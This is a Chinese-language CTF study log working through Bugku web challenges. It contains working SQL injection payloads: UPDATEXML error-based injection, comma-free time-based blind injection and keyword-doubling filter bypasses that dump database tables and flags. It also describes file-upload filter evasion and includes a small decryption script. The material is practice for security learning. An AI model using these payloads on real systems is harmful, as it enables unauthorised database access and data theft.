2020.09.19
go on,今天務必搞定web
經驗教訓
- 能執行php標籤的副檔名有php4,phtml,phtm,phps,php5等,可以在php被過濾的時候嘗試;
- html請求頭中,對內容是不區分大小寫識別的,有時候小寫被過濾了,可以試試參雜大寫字母,比如
Content-Type: multipart/form-data;
被過濾,可以考慮Content-Type: Multipart/form-data;
- 檔案上傳漏洞中,主要修改三個地方,兩處Content-Type,一處檔名;
- remote_addr代表客戶端IP,當前配置的輸出結果為最後一個代理伺服器的IP,並不一定是真實客戶端IP;
- 在沒有特殊配置情況下,X-Forwarded-For請求頭不會自動新增到請求頭中;
- php中,explode()方法相當於py中的split,用於用標誌分割字串成陣列;
- 報錯注入一般式子為
' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '
,利用的是UPDATEXML第二個引數需要是Xpath格式,用CONCAT連線不是Xpath格式的符號~達到報錯目的,~的ascii碼是0x7e,可以用這個替代前式子中的'~'; - insert、delete、update中進行報錯注入的位置是在資料後邊閉合引號新增上邊式子就行了;
- 如果連結出現了重定向,那麼務必要關注一下訊息頭;
- 如果a、b兩個值不相同,則異或結果為1。如果a、b兩個值相同,異或結果為0;
第三十五題 細心
https://ctf.bugku.com/challenges#細心
- 開啟,猛一看還以為這題又不能做呢,原來是自定義的404
- 看到自定義的404,那麼就要想到一個檔案
.htaccess
,是php的配置檔案,用來自定義404等等其他操作,訪問試試,很好,我們得到了預設的404?
- 題幹提示了txt,那麼就想到robots.txt,同樣的,依舊是php自帶的檔案,用來儲存目錄的好像是,訪問得到線索
resusl.php
- 訪問得到下邊介面,看著沒啥用,還好最下邊給了點提示,意思就是請求x的值來等於password唄
- 我隨便試了一個
resusl.php?x=admin
,萬萬沒想到就進去了,不管給了flagflag(ctf_0098_lkji-s)
,還給了所以訪問IP,太狠了?
第三十六題 求getshell
https://ctf.bugku.com/challenges#求getshell
- 開啟是這樣的,難不成是檔案上傳漏洞,啊哈哈,滿足他這個奇怪的要求?
- 你不要php我就不給你嗎?不存在的,上傳一句話php試試,上傳.php檔案不行,於是上傳.php.jpg檔案,被更改了檔名,導致不能正常訪問
- 沒啥思路了,看看wp,學到了遺忘的知識,
- wp中的做法主要是修改了三個地方,兩處Content-Type,一處檔名,修改的第二處Content-Type和檔名我們都好理解,但是第一處Content-Type我沒明白怎麼回事,我上傳了正兒八經的jpg檔案,Content-Type也是
multipart/form-data;
,出題人為啥要過濾這個……還有就是怎麼發現的他存在這個過濾,純靠猜測麼……並且這個題,你只要上傳成功檔案就給了flag,
- flag是
KEY{bb35dc123820e}
,這題沒搞明白什麼思路……
第三十七題 INSERT INTO注入
https://ctf.bugku.com/challenges#INSERT%20INTO注入
- 開啟連結,看到自己的ip
- 題目中給了原始碼,結合第一步結果進行程式碼審計:
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ //獲取X-Forwarded-For或者Remote_Addr的值
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip); // 以,為分割,把ip分割為陣列
return $ip_arr[0]; //返回第一個ip,也就是客戶機ip
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')"; // 注入點,我們可以通過X-Forwarded-For來提供一個假的ip,從而進行注入,這裡沒有任何過濾。
mysql_query($sql);
- 有了思路,我隨便試了一個ip,還真成了,那麼,insert該怎麼注入呢?
- 一般可以用報錯注入,順便複習了一下報錯注入,報錯注入,一般式子為
INSERT INTO table(a,b) VALUES('qwk' OR UPDATEXML(1,CONCAT('~',(database()),'~'),3)OR '')
,這個地方不可以使用,因為這個式子包含了逗號,但是原始碼對逗號進行了過濾(用逗號作標誌分割了輸入),有沒有什麼辦法能不用逗號? - 原來如此,這個題,沒有報錯,沒有查詢回顯,只能用延時注入,延時注入的一般式子為
1’ and if(length(database())=1,sleep(5),1) #
,1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) #
,這中間也有逗號,所以,我們要找一個沒有逗號的方法來代替if語句和substr語句。- 還有一種判斷執行語句:select case when 判斷條件 then 執行語句1 else 執行語句2 end
- substr(database() from 1 for 1) = substr(database(),1,1)
- 方法找到了,那麼接下來就是寫指令碼了,因為是盲注,需要sleep方法,需要大量的請求,所以需要指令碼幫忙,並且這種盲注有兩種方法,一種是二分法,這個方法比較難理解,但是比較快速,還有就是遍歷法(我自己取得名字……),這種比較慢,但是好理解,結果直觀,我打算兩種都試試,畢竟遇見一個好題不容易,哈哈哈,我打算專門寫一個隨筆介紹各種方法,奧力給?
- 經過測試,我發現這個題好像不能做了,怎麼也得不到結果,是我的問題嗎?直接搬wp也不行,有沒有老鐵也到和我一樣的問題啊……比較全面的wp
第三十八題 這是一個神奇的登陸框
https://ctf.bugku.com/challenges#這是一個神奇的登陸框
- 又一道404
第三十九題 多次
https://ctf.bugku.com/challenges#多次
- 開啟如下,我發現若存在重定向,那就得好好關注一下這個訊息頭,重定向後的payload是
1ndex.php?id=1
- 測試修改id的值,知道id=5時,出現了有用的訊息,所以思路時sql注入
- 接下來開始測試sql injection
1'
,輸出錯誤;1'%23
,輸出正確,確實存在sql注入;1' ORDER BY 1 %23
,輸出錯誤,可能存在過濾;0' ^(1) %23
,輸出錯誤;0' ^(0) %23
,輸出正確,說明可以用來測試過濾;1' ^(length('select')=0) %23
,輸出錯誤,說明select被過濾(輸出結果是錯誤說明最終結果是0,1與1異或後為0,所以括號中結果為true,也就是說長度為0,也就是被過濾了)1' ^(length('selecselectt')=0) %23
,輸出正確,說明可以用複寫來繞過!- 用以上方法測試了幾個能用得到的
SELECT、WHERE、FROM、OR、UNION
被過濾掉的有SELECT、OR、UNION
0' UNIOunionN SELECselectT 1,2%23
,輸出正確,得到顯示位置;
0' UNIOunionN SELECselectT 1,(database()) %23
,得到資料庫名web1002-1
0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(table_name) FROM infoorrmation_schema.tables WHERE table_schema='web1002-1') %23
,得到表名flag1,hint
,這裡注意information中有or,所以要進行復寫繞過;
0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(column_name) FROM infoorrmation_schema.columns WHERE table_name='flag1') %23
,得到表flag1下列名flag1,address
;
0' UNIOunionN SELECselectT 1,(SELECselectT GROUP_CONCAT(address) FROM flag1) %23
,address中發現下一關地址./Once_More.php
,flag1表中沒有有用資訊;
- 進入下一關,依舊是id=1,再次進行測試……?
- 經過測試,存在sql注入是沒問題,但是問題是沒有select回顯,所以不能再用上邊的辦法,當然他給了另一種方式,那就是報錯注入,這也是出題人的目的吧?♂️正好複習一遍啊哈哈哈
1' AND UPDATEXML(1,(CONCAT('~',(database()),'~')),3)%23
,得到資料庫名web1002-2
1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='web1002-2' ),'~')),3)%23
,得到表名class,flag2
1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag2' ),'~')),3)%23
,得到表flag2的列名flag2,address
1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(flag2) FROM flag2),'~')),3)%23
,得到flag2中內容為flagflag{Bugku-sql_6s-2i-4t-bug}
- 這個flag變成小寫輸入即是答案,你以為到這就完了?當然不是,這個題還有下一關,既然是學習為目的,那麼這次我覺得來做一把?
1' AND UPDATEXML(1,(CONCAT('~',(SELECT GROUP_CONCAT(address) FROM flag2),'~')),3)%23
,得到下一關地址./Have_Fun.php
,幹就完了?
- 出題人很p,那麼應該就是修改請求頭了
- 新增
X-Forwarded-For: 192.168.0.100
後,得到一個二維碼,掃一掃得到你……你……你可以看到我? 好吧,我來自於ErWeiMa.php 順便告訴你兩個密碼 one:引數名是game; tow:flag在admin裡 對了,檔案後@…c=Y
- &……不做了,沒思路,先看一遍再說吧……
第四十題 PHP_encrypt_1(ISCCCTF)
https://ctf.bugku.com/challenges#PHP_encrypt_1(ISCCCTF)
- 下載php開啟如下,是個加密演算法,題目中的字串應該就是加密結果,我們的任務就是寫解密演算法然後得出結果?♂️
<?php
function encrypt($data,$key)
{
$key = md5('ISCC'); // 金鑰
$x = 0;
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) { //把key重複相加成和data一樣長
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) { // 核心演算法,data和key每位ascii相加取餘再ascii得到結果
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str); // base64後輸出
}
?>
- 那麼我是用php寫解碼方法還是用py呢?哈哈哈
#!/usr/bin/env python 3.8
# -*- encoding: utf-8 -*-
#fileName : decry.py
#createTime: 2020/09/19 22:10:49
#author : 喬悟空
#purpose : 此指令碼用於針對特定加密方式解密
import base64
import hashlib
miwen = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA="
miwen = base64.b64decode(miwen).decode()
print(miwen)
key = hashlib.md5('ISCC'.encode()).hexdigest()
print(key)
char = ''
x = 0
for i in range(len(miwen)):
if x == len(key):
x = 0
char += key[x]
x += 1
print(char)
res = ''
for i in range(len(miwen)):
for j in range(2):
tem = 128*j+ord(miwen[i])-ord(char[i])
if tem<33 or tem ==127:
pass
else:
res += chr(tem)
print(+res)
- 解密結果,去掉兩個奇怪的字元就是答案
Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
第四十一題 檔案包含2
https://ctf.bugku.com/challenges#檔案包含2
- 奇怪,好像掛了
第四十二題 flag.php
https://ctf.bugku.com/challenges#flag.php
- 明天再做,累了累了……